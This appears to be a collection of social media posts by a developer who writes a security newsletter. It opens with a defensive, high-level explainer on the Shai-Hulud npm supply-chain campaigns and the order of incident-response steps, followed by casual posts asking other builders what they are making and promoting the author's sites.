The uncomfortable part of the npm supply-chain problem is not that packages can be poisoned. We knew that. The uncomfortable part is that some of our "best practices" assume the attacker is polite enough to stop being dangerous when we revoke their access. The answer may surprise you... And the answer is bad. In the Shai-Hulud npm campaigns, compromised packages were not just stealing secrets. They were using those secrets to keep moving. - GitHub tokens. - npm tokens. - Cloud credentials. - CI/CD secrets. The kind of things that live in build systems because everything was supposed to be automated, fast, and developer-friendly. Then came the nastier twist: malware behavior that researchers described as "having a dead man's switch." In some cases, cutting off access too quickly could trigger destructive behavior if the malware was still active and watching its channels disappear. Which makes the normal incident response reflex weird, fast. "Revoke the token" is still correct. But "revoke the token from an infected host while the malware is still running" may not be the safest first move. That sequence matters. A poisoned package is not just a bad dependency. It can be an entry point into the developer workstation, the CI runner, the maintainer account, the cloud environment, or the next package maintained by the same person. That turns dependency hygiene into an executive risk conversation. Not because every CEO needs to know what package-lock.json does. Please no. Some of us are still recovering from explaining DNS. But leadership does need to understand: If your build pipeline can publish software, deploy infrastructure, and access production-adjacent secrets, then your build pipeline is part of your attack surface. Not a developer convenience. An attack surface. The practical shift: Stop treating token rotation as the whole playbook. It is one step in a controlled response. A better order looks more like: 1. Isolate the suspected host or runner. 2. Stop automatic installs, builds, and publishes. 3. Preserve enough evidence to understand what ran. 4. Check for persistence, malicious workflows, and poisoned lifecycle scripts. 5. Rotate credentials from a clean environment. 6. Move away from long-lived publish tokens where trusted publishing/OIDC is available. 7. Rebuild affected machines and runners instead of cleaning them with a brave face. The brave face is where the incident report gets... "spicy." The bigger lesson is simple: Modern software supply chains are not just about what code you wrote. They are about what code your tools run on your behalf while everyone is trying to move quickly. And sometimes the scariest part of an incident is discovering that the emergency lever is wired to something else. ❓ How are you handling package installs and publishing credentials in CI right now: ❓ ✔️ Trusted publishing/OIDC 👛 Short-lived tokens 🚧 Manual release gates 🕶️ "We should probably look at that soon."

Building software keeps teaching me that half the job is naming things clearly enough that future me does not open the file and immediately start negotiating with himself.

I keep finding old notes for features I was absolutely sure I needed. Then I look at them two weeks later and realize I was just avoiding the hard part. Very rude of past me. Some of the notes were good though, so he is not fully fired.

Every time I think a tool is the problem, it ends up being the workflow. The tool just made the mess easier to see. Rude, but useful.

Local AI models are the first AI trend that feels useful in a very normal way. Less stage-demo magic. More: can this help with messy files without sending the whole project somewhere I have to explain later?

Founders, devs, AI people, spreadsheet people... What are you building today? Apps, automations, calculators, weird useful tools, whatever. Drop it below. I need more stuff to click on while I avoid my own task list.

I keep reminding myself make the tool useful first Pretty can wait its turn Mostly saying this before I spend 40 minutes moving a button three pixels

I keep opening AI tools expecting magic. Then I remember I still have to know what I actually want. Very rude system, honestly.

Small tools still count. A calculator that saves someone ten minutes. A script that fixes one annoying task. A spreadsheet that finally makes the numbers readable. That counts. Ship it.

Solo founders and indie builders, what did you ship this week? Small updates count. Landing pages count. Weird tools count. Drop it below. I want to see the stuff people are actually making.

Builders and tech people, what are you working on today? Apps, SaaS, spreadsheets, AI tools, little scripts, websites, anything. Drop it below. I want more useful stuff in my feed.

Claude Fable 5 has been out for like two days and people are already shipping full little apps with it. Love that. Hate that. I opened one project folder and needed a minute.

Newsletter link for today: Fail-Safe Friday - 06/12/26 mycomputerspot-security.beeh… Quick security read. Practical risk. Check it out!

Here is what I am building right now: worththemath.com/ pivotgg.com/ mycomputerspot-security.beeh… Calculators, security workflow stuff, and the cybersecurity newsletter. Check them out and give me feedback!

Founders, AI devs, tech people, spreadsheet people... What are you working on? Drop the thing below. Half-built tools count. Weird niche products count. Honestly, those are usually the ones I want to click first.

Solo founders and indie hackers, what are you building right now? Apps, spreadsheets, AI tools, websites, half-finished experiments, whatever. Drop it below. I am collecting useful internet rabbit holes for later.

Tech people, I need a better feed. Drop builders, products, tools, or creators I should be paying attention to. Self-promo counts. I am not above clicking on your thing at midnight.

AI devs and tech builders! I need more people in my feed making useful stuff. Apps, SaaS, automations, spreadsheets, weird little tools, all of it. Drop what you're building. Self-promo is allowed because I am not the internet police.

If you're a solo founder building right now, drop your product below. I want to see what people are actually making. Self-promo is allowed. This is me legally permitting it on the internet.

Pixar dropping a Venice cat movie during a timeline full of AI agents and finance drama is good counterprogramming. Sometimes the internet just needs a suspicious little guy on a roof.